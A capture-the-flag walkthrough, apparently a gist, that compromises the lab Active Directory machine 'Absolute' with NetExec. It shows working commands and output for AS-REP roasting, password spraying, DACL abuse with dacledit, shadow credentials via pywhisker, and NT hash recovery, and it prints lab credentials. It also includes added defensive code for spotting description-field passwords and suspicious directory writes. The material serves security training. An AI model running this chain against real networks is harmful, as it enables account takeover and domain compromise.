@mpgn
Last active April 17, 2024 17:04
NetExec vs Absolute

In progress

  1. First we get the domain name so we can add it to our /etc/hosts file
netexec smb 10.10.11.181                                                          
SMB         10.10.11.181    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
  • Domain name: absolute.htb
  • Netbios name: DC
  2. We collect the author names from the pictures, which gives us a nice wordlist of possible usernames; let's check which ones are valid

[image: NetExec username check output, colour-coded as in the legend below]

  • Magenta: user exists
  • Orange: user is AS-REP roastable (no Kerberos pre-authentication required)

Great !

  3. Getting the AS-REP hash of the roastable user d.klay
netexec ldap 10.10.11.181 -u d.klay -p '' --asreproast /tmp/hash 
SMB         10.10.11.181    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.181    445    DC               $krb5asrep$23$d.klay@ABSOLUTE.HTB:519e158a866f1c05b1f487703351ba66$53bb37f684b7a6b525cf5b170721a77d192733c1d920407ca29636b619f759d74ee162763b61bd80bfa946711e9ae2a81ea82fe028a6453eaa6f056d7c7082599c67d49f02880fdf174f93ad3da5c3d5bbca9ac8a0e032f9989cfe0d4b9e806085aaaafb1964a0446d74f97ca61e32aa52558be9b0824ce4018ee9134039e3cead40b851850e67e20c0e22f2384f385e968991c52382f6db347d7a36101dfb2520ee8f05a094e0671369f7a60d2a545f57b3cfea0641f995ac440e7d0df586547e61fd81372ee01f693133961d79bb04a5b9060b7d0ee54d3f7756839d65a9dbbccf687209ad388783ccdbb4 
  4. Crack it with hashcat (mode 18200, Kerberos 5 AS-REP etype 23) and you get the password: Darkmoonsky248girl

  5. We try to connect but we get STATUS_ACCOUNT_RESTRICTION, i.e. NTLM authentication is not allowed for this account

netexec smb 10.10.11.181 -u d.klay -p 'Darkmoonsky248girl'
SMB         10.10.11.181    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.181    445    DC               [-] absolute.htb\d.klay:Darkmoonsky248girl STATUS_ACCOUNT_RESTRICTION 
  6. We sync our clock with the remote DC to avoid the KRB_AP_ERR_SKEW error and use Kerberos to connect with the -k option
sudo timedatectl set-ntp 0
sudo ntpdate 10.10.11.181 
netexec smb 10.10.11.181 -u d.klay -p 'Darkmoonsky248girl' -k
SMB         10.10.11.181    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.181    445    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl
  7. We use this account to list the other users and find a password in the description field of svc_smb: AbsoluteSMBService123!
netexec ldap 10.10.11.181 -u d.klay -p 'Darkmoonsky248girl' -k --users
SMB         10.10.11.181    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.181    389    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl 
LDAP        10.10.11.181    389    DC               [*] Total of records returned 20
LDAP        10.10.11.181    389    DC               Administrator                  Built-in account for administering the computer/domain
LDAP        10.10.11.181    389    DC               Guest                          Built-in account for guest access to the computer/domain
LDAP        10.10.11.181    389    DC               krbtgt                         Key Distribution Center Service Account
LDAP        10.10.11.181    389    DC               J.Roberts                      
LDAP        10.10.11.181    389    DC               M.Chaffrey                     
LDAP        10.10.11.181    389    DC               D.Klay                         
LDAP        10.10.11.181    389    DC               s.osvald                       
LDAP        10.10.11.181    389    DC               j.robinson                     
LDAP        10.10.11.181    389    DC               n.smith                        
LDAP        10.10.11.181    389    DC               m.lovegod                      
LDAP        10.10.11.181    389    DC               l.moore                        
LDAP        10.10.11.181    389    DC               c.colt                         
LDAP        10.10.11.181    389    DC               s.johnson                      
LDAP        10.10.11.181    389    DC               d.lemm                         
LDAP        10.10.11.181    389    DC               svc_smb                        AbsoluteSMBService123!
LDAP        10.10.11.181    389    DC               svc_audit                      
LDAP        10.10.11.181    389    DC               winrm_user                     Used to perform simple network tasks
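As an added audit example (not part of this gist), a small parser over constructed NetExec `ldap --users` lines modelled on the output above, flagging descriptions that carry a password-like token; the svc_backup entry and the scoring heuristic are my own constructions.

```python
import re

# Constructed sample of NetExec `ldap --users` output, modelled on the lines in
# this gist; the svc_backup entry is invented to show a password buried in text.
SAMPLE_USERS_OUTPUT = """\
LDAP        10.10.11.181    389    DC               [+] absolute.htb\\d.klay:Darkmoonsky248girl
LDAP        10.10.11.181    389    DC               Administrator                  Built-in account for administering the computer/domain
LDAP        10.10.11.181    389    DC               J.Roberts
LDAP        10.10.11.181    389    DC               svc_smb                        AbsoluteSMBService123!
LDAP        10.10.11.181    389    DC               svc_backup                     Temp pw: Summer2023! please change
LDAP        10.10.11.181    389    DC               winrm_user                     Used to perform simple network tasks
"""

# One user line: protocol, ip, port, host, samAccountName, optional description.
LINE_RE = re.compile(r"^LDAP\s+\S+\s+\d+\s+\S+\s+(\S+)(?:\s+(.*\S))?\s*$")


def looks_like_password(token: str) -> bool:
    """Heuristic: 8+ chars, contains a digit, and mixes at least three character
    classes (lower, upper, digit, symbol). Prose words like 'Built-in' have no digit."""
    if len(token) < 8 or not re.search(r"\d", token):
        return False
    classes = sum(bool(re.search(p, token))
                  for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]"))
    return classes >= 3


def parse_users(output: str) -> dict:
    """Map samAccountName -> description ('' when empty); status lines ([*], [+]) are skipped."""
    users = {}
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if m and not m.group(1).startswith("["):
            users[m.group(1)] = m.group(2) or ""
    return users


def find_description_secrets(output: str) -> dict:
    """Return {user: token} for every description holding a password-like token."""
    hits = {}
    for user, desc in parse_users(output).items():
        for token in desc.split():
            if looks_like_password(token):
                hits[user] = token
                break
    return hits


if __name__ == "__main__":
    for user, token in find_description_secrets(SAMPLE_USERS_OUTPUT).items():
        print(f"[!] {user}: description contains password-like token {token!r}")
```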
  8. We check the password and it works
netexec ldap 10.10.11.181 -u svc_smb -p 'AbsoluteSMBService123!' -k
SMB         10.10.11.181    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.181    389    DC               [+] absolute.htb\svc_smb:AbsoluteSMBService123!
  9. We list the shares accessible to svc_smb
netexec smb 10.10.11.181 -u svc_smb -p 'AbsoluteSMBService123!' -k --shares
SMB         10.10.11.181    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.181    445    DC               [+] absolute.htb\svc_smb:AbsoluteSMBService123! 
SMB         10.10.11.181    445    DC               [+] Enumerated shares
SMB         10.10.11.181    445    DC               Share           Permissions     Remark
SMB         10.10.11.181    445    DC               -----           -----------     ------
SMB         10.10.11.181    445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.181    445    DC               C$                              Default share
SMB         10.10.11.181    445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.181    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.11.181    445    DC               Shared          READ            
SMB         10.10.11.181    445    DC               SYSVOL          READ            Logon server share 
  10. We list the files on the shares with the spider_plus module
netexec smb 10.10.11.181 -u svc_smb -p 'AbsoluteSMBService123!' -k -M spider_plus
SMB         10.10.11.181    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.181    445    DC               [+] absolute.htb\svc_smb:AbsoluteSMBService123! 
SPIDER_P... 10.10.11.181    445    DC               [*] Started spidering plus with option:
SPIDER_P... 10.10.11.181    445    DC               [*]        DIR: ['print$']
SPIDER_P... 10.10.11.181    445    DC               [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.10.11.181    445    DC               [*]       SIZE: 51200
SPIDER_P... 10.10.11.181    445    DC               [*]     OUTPUT: /tmp/cme_spider_plus
┌──(bonclay㉿kali)-[~/NetExec]
└─$ cat /tmp/nxc_spider_plus/DC.absolute.htb.json | jq '. | map_values(keys)'
...
"Shared": [
    "compiler.sh",
    "test.exe"
  ]
  11. We can download test.exe and compiler.sh with smbclient.py or spider_plus. Then we run test.exe on Windows and notice an LDAP connection on port 389 carrying a new credential: AbsoluteLDAP2022!

  12. We try this credential against the user list we got earlier with --users

netexec smb 10.10.11.181 -u /tmp/users_p -p 'AbsoluteLDAP2022!' -k 
SMB         10.10.11.181    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.181    445    DC               [-] absolute.htb\M.Chaffrey:AbsoluteLDAP2022! KDC_ERR_PREAUTH_FAILED 
SMB         10.10.11.181    445    DC               [-] absolute.htb\D.Klay account vulnerable to asreproast attack 
SMB         10.10.11.181    445    DC               [-] absolute.htb\s.osvald:AbsoluteLDAP2022! KDC_ERR_PREAUTH_FAILED 
SMB         10.10.11.181    445    DC               [-] absolute.htb\j.robinson:AbsoluteLDAP2022! KDC_ERR_PREAUTH_FAILED 
SMB         10.10.11.181    445    DC               [-] absolute.htb\n.smith:AbsoluteLDAP2022! KDC_ERR_PREAUTH_FAILED 
SMB         10.10.11.181    445    DC               [+] absolute.htb\m.lovegod:AbsoluteLDAP2022! 
  13. Next step is running BloodHound to check ACL permissions; this is my solution without using Windows

First, powerview.py was a big failure for me:

(LDAPS)-[dc.absolute.htb]-[absolute\m.lovegod]
PV > Add-DomainObjectAcl -PrincipalIdentity 'm.lovegod' -TargetIdentity 'Network Audit' -Rights WriteMembers -Domain absolute.htb
INFO:root:Found principal identity dn CN=m.lovegod,CN=Users,DC=absolute,DC=htb
INFO:root:Found target identity dn CN=Network Audit,CN=Users,DC=absolute,DC=htb
INFO:root:Adding writemembers privilege to Network Audit
INFO:impacket:Querying domain security descriptor
INFO:impacket:Success! User m.lovegod now has GenericWrite privileges on Network Audit
(LDAPS)-[dc.absolute.htb]-[absolute\m.lovegod]
PV > Add-DomainGroupMember -Identity 'Network Audit' -Members m.lovegod                                                          
00002098: SecErr: DSID-031514A0, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0

So let's bring out the big gun: this fork of impacket contains the dacledit.py script made by https://twitter.com/BlWasp_

sudo python3 ~/impacket_sh/examples/dacledit.py absolute.htb/m.lovegod@dc.absolute.htb -k -dc-ip 10.10.11.181 -principal 'm.lovegod' -target-dn 'CN=Network Audit,CN=Users,DC=absolute,DC=htb' -action write -rights FullControl
Impacket for Exegol - v0.10.1.dev1+20230117.112240.e9f1dc78 - Copyright 2022 Fortra - forked by ThePorgs

[*] No credentials supplied, supply password
Password:
[-] CCache file is not found. Skipping...
[*] DACL backed up to dacledit-20230127-231145.bak
[*] DACL modified successfully!

powerview absolute.htb/m.lovegod:'AbsoluteLDAP2022!'@dc.absolute.htb -k          
(LDAPS)-[dc.absolute.htb]-[absolute\m.lovegod]
PV > Add-GroupMember -Identity 'Network Audit' -Members m.lovegod
INFO:root:User m.lovegod successfully added to Network Audit
Get-DomainGroup -Identity 'Network Audit'
cn                    : Network Audit
description           : Branch to do some auditing
member                : CN=svc_audit,CN=Users,DC=absolute,DC=htb
                        CN=m.lovegod,CN=Users,DC=absolute,DC=htb
distinguishedName     : CN=Network Audit,CN=Users,DC=absolute,DC=htb
instanceType          : 4
name                  : Network Audit
objectGUID            : {7f6b4055-29bf-42a0-ba35-19054c311783}
objectSid             : S-1-5-21-4078382237-1492182817-2568127209-1119
sAMAccountName        : Network Audit
sAMAccountType        : 268435456
groupType             : -2147483646
objectCategory        : CN=Group,CN=Schema,CN=Configuration,DC=absolute,DC=htb

  14. m.lovegod is now a member of the group "Network Audit", which has GenericWrite over the user winrm_user

  15. Using the Shadow Credentials technique and pywhisker by https://twitter.com/_nwodtuhs we can get the NT hash of winrm_user

python3 pywhisker.py -d absolute.htb -u 'm.lovegod' -p 'AbsoluteLDAP2022!' -k --target "winrm_user" --action add --filename winrm_c
expected str, bytes or os.PathLike object, not NoneType
[*] Searching for the target account
[*] Target user found: CN=winrm_user,CN=Users,DC=absolute,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 9c21e640-48a5-9176-09aa-7a14ac891004
[*] Updating the msDS-KeyCredentialLink attribute of winrm_user
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: winrm_c.pfx
[*] Must be used with password: PL9DBGYJiuA7wygXOfd3
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
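A defender-side counterpart to the three directory writes performed above (the dacledit DACL change, the group membership add and the pywhisker msDS-KeyCredentialLink write), as an added example that is not from this gist: a triage over constructed Windows Security event 5136 records. It assumes "Audit Directory Service Changes" is enabled with a SACL on the objects, and the DC$ self-write is a constructed benign case.

```python
# Constructed Windows Security event 5136 records ("a directory service object was
# modified") reduced to the relevant fields; DNs mirror this gist's domain. Real
# events require "Audit Directory Service Changes" plus a SACL on the objects.
ADDED = "%%14674"  # OperationType that resolves to "Value Added"
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "m.lovegod", "OperationType": ADDED,
     "ObjectDN": "CN=Network Audit,CN=Users,DC=absolute,DC=htb",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 5136, "SubjectUserName": "m.lovegod", "OperationType": ADDED,
     "ObjectDN": "CN=Network Audit,CN=Users,DC=absolute,DC=htb",
     "AttributeLDAPDisplayName": "member",
     "AttributeValue": "CN=m.lovegod,CN=Users,DC=absolute,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "m.lovegod", "OperationType": ADDED,
     "ObjectDN": "CN=winrm_user,CN=Users,DC=absolute,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink"},
    {"EventID": 5136, "SubjectUserName": "DC$", "OperationType": ADDED,   # benign self-enrolment
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=absolute,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink"},
]

# Attributes whose writes map onto the steps in this gist.
SENSITIVE = {
    "nTSecurityDescriptor": "DACL modified (dacledit-style)",
    "member": "group membership changed",
    "msDS-KeyCredentialLink": "key credential added (shadow credentials)",
}


def rdn_value(dn: str) -> str:
    """'CN=winrm_user,CN=Users,...' -> 'winrm_user'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def triage(events):
    """Return (writer, target, reason) for sensitive value-added writes.
    A computer account adding a key credential to itself is ordinary device
    enrolment and is suppressed; a user adding *itself* to a group is escalated."""
    alerts = []
    for e in events:
        if e.get("EventID") != 5136 or e.get("OperationType") != ADDED:
            continue
        attr = e.get("AttributeLDAPDisplayName")
        if attr not in SENSITIVE:
            continue
        writer = e["SubjectUserName"].rstrip("$").lower()
        target = rdn_value(e["ObjectDN"])
        if attr == "msDS-KeyCredentialLink" and writer == target.lower():
            continue
        reason = SENSITIVE[attr]
        if attr == "member" and rdn_value(e.get("AttributeValue", "=")).lower() == writer:
            reason += " (writer added itself)"
        alerts.append((e["SubjectUserName"], target, reason))
    return alerts
```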

python3 gettgtpkinit.py -cert-pfx ../pywhisker/winrm_c.pfx -pfx-pass PL9DBGYJiuA7wygXOfd3 absolute.htb/winrm_user  tgt_winrm  
2023-01-27 23:32:12,510 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2023-01-27 23:32:12,524 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2023-01-27 23:32:24,639 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2023-01-27 23:32:24,639 minikerberos INFO     9258887d53cbb14e70e77d334c4074e4c3785343da2f54a27d8d19c1d72407d1
INFO:minikerberos:9258887d53cbb14e70e77d334c4074e4c3785343da2f54a27d8d19c1d72407d1
2023-01-27 23:32:24,642 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file


KRB5CCNAME=tgt_winrm python3 getnthash.py -key 9258887d53cbb14e70e77d334c4074e4c3785343da2f54a27d8d19c1d72407d1 absolute.htb/winrm_user
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
8738c7413a5da3bc1d083efc0ab06cb2
  16. We have the NT hash but it is useless here since NTLM is not allowed, so we stick with the TGT and use evil-winrm to get the flag